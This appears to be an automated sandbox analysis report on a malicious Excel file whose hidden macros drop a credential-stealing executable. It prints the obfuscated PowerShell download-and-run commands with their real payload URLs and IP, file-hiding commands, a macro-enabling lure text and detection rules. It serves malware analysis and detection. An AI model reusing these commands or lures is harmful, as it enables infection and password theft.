
Analysis Report ul9kpUwYel.xls

Overview

General Information

Sample Name: ul9kpUwYel.xls
Analysis ID: 337274
MD5: c2ca4d5f2632597023b6cf5b496fb4ed
SHA1: 076f6120eb80059c41e8d731d59471a2e9d81ad8
SHA256: 1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
Tags: SilentBuilder, xls

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell downloading file from url shortener site
Contains functionality to steal Internet Explorer form passwords
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Obfuscated Powershell
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2484 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2604 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2300 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2524 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 284 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2492 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2936 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • attrib.exe (PID: 152 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)
    • cmd.exe (PID: 2320 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2460 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • cmd.exe (PID: 1924 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • mode.com (PID: 2420 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)
          • cmd.exe (PID: 952 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • cmd.exe (PID: 972 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • powershell.exe (PID: 2036 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
              • cr.exe (PID: 2240 cmdline: 'C:\Users\user\AppData\Roaming\cr.exe' MD5: 740E559929463320CB8E0403FD35A097)
    • cmd.exe (PID: 2848 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2860 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: ul9kpUwYel.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x44bc2:$s1: Excel
  • 0x4135e:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

Source: dump.pcap
Rule: SUSP_PowerShell_Caret_Obfuscation_2
Description: Detects powershell keyword obfuscated with carets
Author: Florian Roth
Strings:
  • 0x12a6f:$r1: p^owersh^el^l
  • 0x12c98:$r1: p^owersh^el^l
  • 0x12f05:$r1: p^owersh^el^l
  • 0x130e2:$r1: p^owersh^el^l
  • 0x12a6f:$r2: p^owersh^el^l
  • 0x12c98:$r2: p^owersh^el^l
  • 0x12f05:$r2: p^owersh^el^l
  • 0x130e2:$r2: p^owersh^el^l

Source: dump.pcap
Rule: JoeSecurity_ObfuscatedPowershell
Description: Yara detected Obfuscated Powershell
Author: Joe Security

Dropped Files

Source: C:\Users\user\Documents\pd.bat
Rule: SUSP_PowerShell_Caret_Obfuscation_2
Description: Detects powershell keyword obfuscated with carets
Author: Florian Roth
Strings:
  • 0xd4:$r1: p^owersh^el^l
  • 0x2fd:$r1: p^owersh^el^l
  • 0x524:$r1: p^owersh^el^l
  • 0x701:$r1: p^owersh^el^l
  • 0xd4:$r2: p^owersh^el^l
  • 0x2fd:$r2: p^owersh^el^l
  • 0x524:$r2: p^owersh^el^l
  • 0x701:$r2: p^owersh^el^l

Source: C:\Users\user\Documents\pd.bat
Rule: JoeSecurity_ObfuscatedPowershell
Description: Yara detected Obfuscated Powershell
Author: Joe Security

Memory Dumps

Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp
Rule: SUSP_PowerShell_Caret_Obfuscation_2
Description: Detects powershell keyword obfuscated with carets
Author: Florian Roth
Strings:
  • 0x1b0da:$r1: p^owersh^el^l
  • 0x1b303:$r1: p^owersh^el^l
  • 0x1b52a:$r1: p^owersh^el^l
  • 0x1b707:$r1: p^owersh^el^l
  • 0x1d78c:$r1: p^owersh^el^l
  • 0x1d9b5:$r1: p^owersh^el^l
  • 0x1dbdc:$r1: p^owersh^el^l
  • 0x1ddb9:$r1: p^owersh^el^l
  • 0x1e04c:$r1: p^owersh^el^l
  • 0x1e275:$r1: p^owersh^el^l
  • 0x1e49c:$r1: p^owersh^el^l
  • 0x1e679:$r1: p^owersh^el^l
  • 0x1b0da:$r2: p^owersh^el^l
  • 0x1b303:$r2: p^owersh^el^l
  • 0x1b52a:$r2: p^owersh^el^l
  • 0x1b707:$r2: p^owersh^el^l
  • 0x1d78c:$r2: p^owersh^el^l
  • 0x1d9b5:$r2: p^owersh^el^l
  • 0x1dbdc:$r2: p^owersh^el^l
  • 0x1ddb9:$r2: p^owersh^el^l
  • 0x1e04c:$r2: p^owersh^el^l

Sigma Overview

System Summary:

Sigma detected: Powershell downloading file from url shortener site
Source: Process started | Author: Joe Security | Data: Command: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), CommandLine: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2848, ProcessCommandLine: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), ProcessId: 2860
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis | Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2484, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2604
Sigma detected: Hiding Files with Attrib.exe
Source: Process started | Author: Sami Ruohonen | Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2936, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 152

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://chebo.discountmonumentcenter.com/vantuz_2021.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: trashbininspector.fun | Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe | ReversingLabs: Detection: 72%
Multi AV Scanner detection for submitted file
Source: ul9kpUwYel.xls | Virustotal: Detection: 41%
Source: ul9kpUwYel.xls | Metadefender: Detection: 22%
Source: ul9kpUwYel.xls | ReversingLabs: Detection: 34%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0040B831 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00409D52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0041A507 __EH_prolog,_strlen,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0040A753 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0040908B __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_004233DC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_004235AF lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0040964F __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_004339BC lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0029362C CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0028A757 __EH_prolog,_strlen,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_002937FF CredEnumerateW,CryptUnprotectData,LocalFree,AuditFree,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0027989F __EH_prolog,wsprintfA,CryptUnprotectData,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0027A9A3 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0027BA81 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_002A3C0C lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlen,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00279FA2 __EH_prolog,wsprintfA,_wcsstr,CryptUnprotectData,LocalFree,
Source: unknown | HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0045F42D FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_002CF67D FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
Source: global traffic | DNS query: name: cutt.ly
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Jan 2021 08:06:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 04 Jan 2021 21:24:49 GMTAccept-Ranges: bytesContent-Length: 565248Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 d5 65 2a f6 b4 0b 79 f6 b4 0b 79 f6 b4 0b 79 e8 e6 8f 79 ed b4 0b 79 e8 e6 9e 79 ee b4 0b 79 e8 e6 88 79 97 b4 0b 79 d1 72 70 79 fd b4 0b 79 f6 b4 0a 79 93 b4 0b 79 e8 e6 81 79 f7 b4 0b 79 e8 e6 9f 79 f7 b4 0b 79 e8 e6 9a 79 f7 b4 0b 79 52 69 63 68 f6 b4 0b 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 b8 18 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 08 00 00 80 00 00 00 c0 37 04 b0 36 3f 04 00 d0 37 04 00 00 40 04 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 40 04 00 10 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 71 40 04 60 01 00 00 00 00 40 04 04 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 38 3f 04 18 00 00 00 88 f6 3f 04 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 c0 37 04 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 08 00 00 d0 37 04 00 28 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 
00 e0 2e 72 73 72 63 00 00 00 00 80 00 00 00 00 40 04 00 74 00 00 00 2c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic | HTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
Source: Joe Sandbox View | IP Address: 195.201.225.248 195.201.225.248
Source: Joe Sandbox View | IP Address: 37.46.150.139 37.46.150.139
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: unknown | HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown | TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown | TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown | TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown | TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: global traffic | HTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49177 -> 443
Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_004254E5 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,
Source: C:\Users\user\AppData\Roaming\cr.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: dump.pcap, type: PCAPMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
      Source: Screenshot number: 4Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Screenshot number: 8Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
      Source: Screenshot number: 8Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
